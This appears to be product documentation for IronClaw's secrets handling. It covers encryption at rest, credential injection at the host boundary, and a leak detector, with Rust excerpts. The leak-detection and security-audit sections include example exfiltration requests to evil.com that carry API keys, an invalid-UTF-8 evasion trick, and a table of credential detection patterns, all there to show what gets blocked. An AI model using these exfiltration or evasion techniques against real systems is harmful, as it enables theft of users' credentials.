Documentation Index
Fetch the complete documentation index at: https://mintlify.com/nearai/ironclaw/llms.txt
Use this file to discover all available pages before exploring further.
IronClaw ensures that secrets are never exposed to WASM tools. Credentials are encrypted at rest, injected at the host boundary during HTTP requests, and all outputs are scanned for leakage.
Security Model
Three core principles:
- Secrets never enter WASM memory - Tools can check existence, not read values
- Encryption at rest - AES-256-GCM with per-secret key derivation
- Leak detection - All outbound requests and responses are scanned
Architecture
┌─────────────────────────────────────────────────────────────────┐
│ Secret Lifecycle │
│ │
│ User stores secret ──► Encrypt (AES-256-GCM) ──► PostgreSQL │
│ (per-secret HKDF key) │
│ │
│ WASM requests HTTP ──► Allowlist check ──► Decrypt secret │
│ │ │
│ ▼ │
│ Leak scan request ──► Inject │
│ (block if leaked) credential │
│ │ │
│ ▼ │
│ Execute HTTP │
│ │ │
│ ▼ │
│ Leak scan response ◄── Response │
│ (redact if leaked) │
│ │ │
│ ▼ │
│ Return to WASM (sanitized) │
└─────────────────────────────────────────────────────────────────┘
Encryption at Rest
Cryptographic Primitives
- Algorithm: AES-256-GCM (authenticated encryption)
- Key derivation: HKDF-SHA256 (per-secret keys from master key)
- Salt size: 32 bytes (random per secret)
- Nonce size: 12 bytes (random per encryption)
- Tag size: 16 bytes (authentication tag)
Key Derivation
Each secret gets its own encryption key derived from the master key:
master_key (from env/keychain) ──┬──► HKDF-SHA256 ──► derived_key
│
per-secret salt (32 bytes) ─────┘
From src/secrets/crypto.rs:129-140:
fn derive_key(&self, salt: &[u8]) -> Result<[u8; 32]> {
let master_bytes = self.master_key.expose_secret().as_bytes();
// HKDF extract + expand
let hk = Hkdf::<Sha256>::new(Some(salt), master_bytes);
let mut derived = [0u8; 32];
hk.expand(b"near-agent-secrets-v1", &mut derived)?;
Ok(derived)
}
This means:
- Two secrets with the same plaintext have different ciphertexts
- Compromising one secret doesn’t compromise others
- Master key rotation requires re-encrypting all secrets
Encryption Process
From src/secrets/crypto.rs:66-93:
pub fn encrypt(&self, plaintext: &[u8]) -> Result<(Vec<u8>, Vec<u8>)> {
// 1. Generate random salt
let salt = Self::generate_salt(); // 32 random bytes
// 2. Derive encryption key from master key + salt
let derived_key = self.derive_key(&salt)?;
// 3. Create AES-256-GCM cipher
let cipher = Aes256Gcm::new_from_slice(&derived_key)?;
// 4. Generate random nonce
let nonce = Aes256Gcm::generate_nonce(&mut OsRng); // 12 random bytes
// 5. Encrypt (includes authentication tag)
let ciphertext = cipher.encrypt(&nonce, plaintext)?;
// 6. Combine: nonce || ciphertext || tag
let mut encrypted = Vec::new();
encrypted.extend_from_slice(&nonce);
encrypted.extend_from_slice(&ciphertext);
Ok((encrypted, salt))
}
Stored in database:
encrypted_value: nonce (12 bytes) + ciphertext + tag (16 bytes)
key_salt: 32-byte salt for key derivation
Decryption Process
From src/secrets/crypto.rs:99-126:
pub fn decrypt(&self, encrypted_value: &[u8], salt: &[u8]) -> Result<DecryptedSecret> {
// 1. Derive the same key using stored salt
let derived_key = self.derive_key(salt)?;
// 2. Create cipher
let cipher = Aes256Gcm::new_from_slice(&derived_key)?;
// 3. Split: nonce || ciphertext
let (nonce_bytes, ciphertext) = encrypted_value.split_at(12);
let nonce = Nonce::from_slice(nonce_bytes);
// 4. Decrypt + verify authentication tag
let plaintext = cipher.decrypt(nonce, ciphertext)?; // Fails if tampered
DecryptedSecret::from_bytes(plaintext)
}
Decryption automatically verifies the authentication tag. Tampered ciphertext is rejected.
Master Key Storage
Option 1: OS Keychain (Recommended)
Auto-generated during onboarding:
ironclaw onboard
# Generates 32-byte key, stores in:
# - macOS: Keychain Access
# - Windows: Credential Manager
# - Linux: Secret Service (GNOME Keyring, KWallet)
Implementation in src/secrets/keychain.rs.
Option 2: Environment Variable
For CI/Docker deployments:
# Generate secure key
openssl rand -base64 32
# Set environment variable
export SECRETS_MASTER_KEY="<generated-key>"
Key requirements:
- Minimum length: 32 bytes
- Entropy: High-quality randomness (use
openssl rand, not keyboard mashing)
- Storage: Secure vault (e.g., AWS Secrets Manager, HashiCorp Vault)
Credential Injection
WASM tools never receive plaintext secrets. Instead, the host injects credentials at the HTTP boundary.
WASM Perspective
Tools can only:
- Check existence:
let exists = secret_exists("openai_api_key"); // Returns: true/false
- Trigger injection (implicitly via HTTP capability):
{
"http": {
"credentials": [
{
"secret_name": "openai_api_key",
"location": { "AuthorizationBearer": {} },
"host_patterns": ["api.openai.com"]
}
]
}
}
Tools cannot:
- ❌ Read secret values
- ❌ List available secrets
- ❌ Access secrets not in their
allowed_names
Host Injection Process
From src/tools/wasm/credential_injector.rs:
// 1. WASM calls http_request("https://api.openai.com/v1/chat", ...)
pub fn http_request(url: &str, headers: &[(String, String)]) {
// 2. Check allowlist
allowlist_validator.validate(url, "POST")?;
// 3. Find matching credential mapping
let mapping = find_credential_for_host(url)?;
// 4. Decrypt secret (in memory only)
let decrypted = secrets_store.get_decrypted(user_id, mapping.secret_name).await?;
// 5. Inject based on location
match mapping.location {
CredentialLocation::AuthorizationBearer => {
headers.push(("Authorization", format!("Bearer {}", decrypted.expose())));
}
CredentialLocation::Header { name, prefix } => {
let value = if let Some(p) = prefix {
format!("{}{}", p, decrypted.expose())
} else {
decrypted.expose().to_string()
};
headers.push((name, value));
}
CredentialLocation::QueryParam { name } => {
url = add_query_param(url, name, decrypted.expose());
}
}
// 6. Secret is dropped here (memory zeroed)
// 7. Execute request
execute_http(url, headers).await
}
Injection Locations
From src/secrets/types.rs:198-214:
Authorization Bearer
CredentialLocation::AuthorizationBearer
Injects as:
Authorization: Bearer <secret>
Authorization Basic
CredentialLocation::AuthorizationBasic { username: "api" }
Injects as:
Authorization: Basic <base64(username:secret)>
CredentialLocation::Header {
name: "X-API-Key",
prefix: Some("Bearer "),
}
Injects as:
X-API-Key: Bearer <secret>
Query Parameter
CredentialLocation::QueryParam { name: "api_key" }
Injects as:
https://api.example.com/data?api_key=<secret>
Example: OpenAI API
Capabilities file:
{
"http": {
"allowlist": [
{
"host": "api.openai.com",
"path_prefix": "/v1/",
"methods": ["POST"]
}
],
"credentials": [
{
"secret_name": "openai_api_key",
"location": { "AuthorizationBearer": {} },
"host_patterns": ["api.openai.com"]
}
]
},
"secrets": {
"allowed_names": ["openai_api_key"]
}
}
Flow:
- WASM calls:
http_request("https://api.openai.com/v1/chat/completions", ...)
- Host checks: ✓ Allowlist allows this endpoint
- Host finds: Credential mapping for
api.openai.com
- Host decrypts:
openai_api_key secret
- Host injects:
Authorization: Bearer sk-proj-...
- Host executes: HTTP POST with injected header
- WASM receives: Response (after leak scanning)
Leak Detection
All data crossing the WASM boundary is scanned for secrets.
Scan Points
-
Outbound HTTP requests (before execution)
-
Inbound HTTP responses (before returning to WASM)
- Response body
- Response headers (optional)
-
Tool outputs (before showing to user)
-
User input (before sending to LLM)
- Detect accidentally pasted secrets
Detection Patterns
From src/safety/leak_detector.rs:414-531:
| Pattern | Example | Action |
|---|
| OpenAI API key | sk-proj-... | Block |
| Anthropic API key | sk-ant-api... | Block |
| AWS Access Key | AKIAIOSFODNN7EXAMPLE | Block |
| GitHub token | ghp_... | Block |
| GitHub PAT | github_pat_... | Block |
| Stripe key | sk_live_... | Block |
| NEAR AI session | sess_... | Block |
| PEM private key | -----BEGIN PRIVATE KEY----- | Block |
| SSH private key | -----BEGIN OPENSSH PRIVATE KEY----- | Block |
| Google API key | AIza... | Block |
| Slack token | xoxb-... | Block |
| Bearer token | Bearer <long-string> | Redact |
| High-entropy hex | 64-char hex string | Warn |
Scan Algorithm
Two-phase matching for performance:
Phase 1: Aho-Corasick prefix matching
// Extract literal prefixes from regex patterns
// e.g., "sk-proj-" from r"sk-proj-[a-zA-Z0-9]{20,}"
let prefixes = extract_prefixes(&patterns);
let ac = AhoCorasick::new(&prefixes);
// Fast check: does content contain any prefix?
let candidates = ac.find_iter(content);
Phase 2: Full regex validation
// Only check patterns whose prefixes matched
for pattern in candidate_patterns {
for match in pattern.regex.find_iter(content) {
matches.push(LeakMatch { ... });
}
}
This hybrid approach is orders of magnitude faster than checking all regex patterns.
Leak Actions
From src/safety/leak_detector.rs:46-65:
pub enum LeakAction {
Block, // Reject the request/response entirely
Redact, // Replace secret with [REDACTED]
Warn, // Log warning, allow content
}
Block: Critical secrets (API keys, private keys)
if result.should_block {
return Err(LeakDetectionError::SecretLeakBlocked {
pattern: "openai_api_key",
preview: "sk-pr****cdef",
});
}
Redact: Less critical patterns (bearer tokens)
let redacted = apply_redactions(content, &redact_ranges);
// "Authorization: Bearer ey..." -> "Authorization: [REDACTED]"
Warn: Low-confidence matches (high-entropy hex)
tracing::warn!(
pattern = "high_entropy_hex",
preview = "a3f5****b2c1",
"Potential secret leak detected (warning only)"
);
Secret Masking
Secrets in logs/errors are partially masked:
fn mask_secret(secret: &str) -> String {
if secret.len() <= 8 {
return "*".repeat(secret.len());
}
let prefix: String = secret.chars().take(4).collect();
let suffix: String = secret.chars().skip(secret.len() - 4).collect();
let middle_len = secret.len() - 8;
format!("{}{}{}", prefix, "*".repeat(middle_len.min(8)), suffix)
}
Examples:
sk-proj-abc123def456ghi789 → sk-p********i789
AKIAIOSFODNN7EXAMPLE → AKIA********MPLE
short → *****
HTTP Request Scanning
From src/safety/leak_detector.rs:294-326:
pub fn scan_http_request(
&self,
url: &str,
headers: &[(String, String)],
body: Option<&[u8]>,
) -> Result<(), LeakDetectionError> {
// 1. Scan URL
self.scan_and_clean(url)?;
// 2. Scan each header value
for (name, value) in headers {
self.scan_and_clean(value)
.map_err(|e| LeakDetectionError::SecretLeakBlocked {
pattern: format!("header:{}", name),
preview: e.to_string(),
})?;
}
// 3. Scan body (use lossy UTF-8 conversion)
if let Some(body_bytes) = body {
let body_str = String::from_utf8_lossy(body_bytes);
self.scan_and_clean(&body_str)?;
}
Ok(())
}
This catches exfiltration attempts like:
GET https://evil.com/steal?key=AKIAIOSFODNN7EXAMPLE // ❌ Blocked
POST https://api.example.com
X-Exfil: sk-proj-abc123... // ❌ Blocked
{"stolen": "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"} // ❌ Blocked
Database Schema
Secrets table (PostgreSQL):
CREATE TABLE secrets (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
user_id TEXT NOT NULL,
name TEXT NOT NULL,
encrypted_value BYTEA NOT NULL, -- nonce || ciphertext || tag
key_salt BYTEA NOT NULL, -- 32-byte salt for HKDF
provider TEXT, -- Optional: "openai", "stripe", etc.
expires_at TIMESTAMPTZ, -- Optional expiration
last_used_at TIMESTAMPTZ, -- Track usage
usage_count BIGINT DEFAULT 0, -- Audit trail
created_at TIMESTAMPTZ DEFAULT NOW(),
updated_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(user_id, name) -- One secret per name per user
);
Key points:
encrypted_value and key_salt stored as binary blobs
name is case-insensitive (normalized to lowercase)
usage_count incremented on each injection (audit trail)
- No plaintext values stored anywhere
Secret Lifecycle
1. Creation
use ironclaw::secrets::{SecretsStore, CreateSecretParams};
let params = CreateSecretParams::new("openai_api_key", "sk-proj-...");
store.create("user_123", params).await?;
Flow:
- User provides plaintext secret
- Generate random 32-byte salt
- Derive encryption key via HKDF(master_key, salt)
- Generate random 12-byte nonce
- Encrypt with AES-256-GCM
- Store
encrypted_value and key_salt in database
- Zero plaintext memory
2. Existence Check (WASM)
let exists = store.exists("user_123", "openai_api_key").await?;
// Returns: true/false (no decryption needed)
3. Injection (Host Only)
let decrypted = store.get_decrypted("user_123", "openai_api_key").await?;
// Returns: DecryptedSecret (held in secure memory)
// Use immediately
let header = format!("Bearer {}", decrypted.expose());
// DecryptedSecret dropped here, memory zeroed
4. Rotation
let new_params = CreateSecretParams::new("openai_api_key", "sk-proj-NEW...");
store.update("user_123", "openai_api_key", new_params).await?;
Old secret is overwritten, new salt/nonce generated.
5. Deletion
store.delete("user_123", "openai_api_key").await?;
Database row deleted. Encrypted value is lost (irreversible).
Security Audit
Attack: WASM calls get_secret("openai_api_key")
Defense: Function not exposed. Only secret_exists() available.
Attack: WASM includes secret in URL/body
http_request("https://evil.com/steal?key=sk-proj-...", ...)
Defense: Leak detector blocks request before execution.
Attack: WASM echoes secret in response
return format!("Using key: {}", secret); // But WASM never has secret!
Defense:
- WASM can’t access secret (no plaintext in memory)
- If somehow leaked, output sanitizer redacts it
Threat: Binary Body Exfiltration
Attack: Prepend invalid UTF-8 byte to evade string scanning
let mut body = vec![0xFF]; // Invalid UTF-8 lead byte
body.extend_from_slice(b"sk-proj-abc123...");
Defense: Leak detector uses lossy UTF-8 conversion
let body_str = String::from_utf8_lossy(body_bytes);
self.scan_and_clean(&body_str)?; // Still scans the secret
Threat: Database Dump
Attack: Attacker gains read access to PostgreSQL
Defense: All secrets are encrypted. Without master key, ciphertext is useless.
Threat: Master Key Compromise
Attack: Attacker steals SECRETS_MASTER_KEY env var
Defense:
- Use OS keychain (harder to extract)
- Rotate master key + re-encrypt all secrets
- Audit logs for suspicious decryption activity
Best Practices
For Developers
- Never log decrypted secrets
// ❌ BAD
tracing::info!("Using API key: {}", decrypted.expose());
// ✓ GOOD
tracing::info!("Using API key: {}", decrypted.len());
- Minimize plaintext lifetime
// Decrypt, use immediately, drop
let decrypted = store.get_decrypted(user, name).await?;
let header = format!("Bearer {}", decrypted.expose());
// decrypted dropped here
- Check leak detection results
let result = leak_detector.scan(&content);
if result.should_block {
return Err(...);
}
if !result.is_clean() {
tracing::warn!("Potential leak: {:?}", result.matches);
}
For Users
- Use short-lived secrets when possible
let params = CreateSecretParams::new("temp_token", "...")
.with_expiry(Utc::now() + Duration::hours(1));
- Rotate secrets regularly
ironclaw config set openai_api_key <new-key>
- Monitor usage
SELECT name, usage_count, last_used_at FROM secrets WHERE user_id = 'you';
- Secure master key
- OS keychain: Backed up with system backups
- Env var: Store in secure vault (AWS Secrets Manager, etc.)
Source Code References
See Also